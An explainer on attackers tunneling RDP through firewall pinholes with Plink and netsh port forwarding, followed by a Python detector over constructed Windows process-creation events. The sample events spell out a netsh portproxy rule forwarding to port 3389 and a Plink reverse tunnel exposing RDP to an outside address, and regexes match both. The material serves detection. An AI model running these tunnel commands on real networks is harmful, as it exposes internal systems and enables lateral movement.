Once attackers have gained a foothold in a compromised system, they can switch from backdoors to direct Remote Desktop Protocol (RDP) sessions for remote access. RDP is part of the Remote Desktop Services component of Microsoft Windows.
Threat actors may use network tunneling and port forwarding to take advantage of firewall "pinholes": ports the firewall leaves open so that an application can reach a service on a host inside the protected network. A pinhole is used to establish a connection to a remote server that the firewall would otherwise block, and that connection then serves as a transport for sending, or "tunneling", local listening services (inside the firewall) out through the firewall, making them reachable from the remote server (outside the firewall).
Attackers also use utilities such as Plink to create encrypted tunnels through which the RDP ports of infected systems can communicate back to the attacker's command-and-control (C2) server.
RDP sessions also enable lateral movement within an environment: the native Windows Network Shell (netsh) command can be used for RDP port forwarding to reach newly discovered segmented networks that are accessible only through an administrative jump box.
For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic sent from a previously compromised system. That traffic would then be forwarded straight through the jump box to any system on the segmented network on any designated port, including the default RDP port, TCP 3389. In this way threat actors spread across network routes that are already allowed.
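The netsh port-forwarding and Plink tunnels described above both leave process-creation records (Sysmon Event ID 1 or Security Event 4688 command lines) that a defender can match on. The following is an added example, not part of the original text: a small Python detector run over constructed command-line samples, where the hostnames, accounts, addresses and rule names are placeholders chosen for the example.

```python
import re

# Constructed sample process-creation events (the command-line field of Sysmon Event ID 1
# or Security Event 4688). Hostnames, accounts and addresses are placeholders.
SAMPLE_EVENTS = [
    {"host": "JUMPBOX01", "user": "CORP\\svc_admin",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=8001 "
                "listenaddress=0.0.0.0 connectport=3389 connectaddress=10.20.30.40"},
    {"host": "WKSTN07", "user": "CORP\\jdoe",
     "cmdline": "plink.exe -P 443 user@203.0.113.10 -R 12345:127.0.0.1:3389"},
    {"host": "WKSTN07", "user": "CORP\\jdoe",
     "cmdline": "netsh advfirewall show allprofiles"},
    {"host": "ADMIN02", "user": "CORP\\ops",
     "cmdline": "plink.exe -ssh build@10.0.0.5 -batch uptime"},
]

RDP_PORT = 3389
# netsh portproxy rule creation and its key=value arguments
PORTPROXY_RE = re.compile(r"\bportproxy\s+add\s+v4tov4\b(?P<args>.*)", re.IGNORECASE)
PORTPROXY_ARG_RE = re.compile(r"(listenport|listenaddress|connectport|connectaddress)=(\S+)", re.IGNORECASE)
# Plink/OpenSSH remote forward: -R [bind_addr:]port:host:hostport
REMOTE_FWD_RE = re.compile(r"-R\s+(?:(?P<bind>[\w.]+):)?(?P<lport>\d+):(?P<host>[\w.]+):(?P<hport>\d+)")


def analyze(event: dict) -> list[dict]:
    """Return the findings raised by one process-creation event (empty list if benign)."""
    cmd = event["cmdline"]
    findings = []
    m = PORTPROXY_RE.search(cmd)
    if m:
        args = {k.lower(): v for k, v in PORTPROXY_ARG_RE.findall(m.group("args"))}
        to_rdp = args.get("connectport") == str(RDP_PORT)
        findings.append({
            "rule": "netsh_portproxy_to_rdp" if to_rdp else "netsh_portproxy_added",
            "listen": f"{args.get('listenaddress', '*')}:{args.get('listenport', '?')}",
            "target": f"{args.get('connectaddress', '?')}:{args.get('connectport', '?')}",
        })
    # A Plink remote forward whose destination is the local RDP port exposes RDP to the far end
    fwd = REMOTE_FWD_RE.search(cmd) if "plink" in cmd.lower() else None
    if fwd:
        to_rdp = fwd.group("hport") == str(RDP_PORT)
        findings.append({
            "rule": "plink_reverse_tunnel_to_rdp" if to_rdp else "plink_reverse_tunnel",
            "remote_listener": fwd.group("lport"),
            "exposed": f"{fwd.group('host')}:{fwd.group('hport')}",
        })
    return findings


def run(events: list[dict] = SAMPLE_EVENTS) -> list[dict]:
    """Evaluate every event and attach host and user so an analyst can pivot on them."""
    return [{"host": e["host"], "user": e["user"], **f} for e in events for f in analyze(e)]
```

Against the constructed samples, `run()` flags the jump-box portproxy rule and the Plink reverse tunnel and leaves the two benign administrative commands alone; a hit on a host that is not a sanctioned jump box is the one to escalate.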
Network security bypass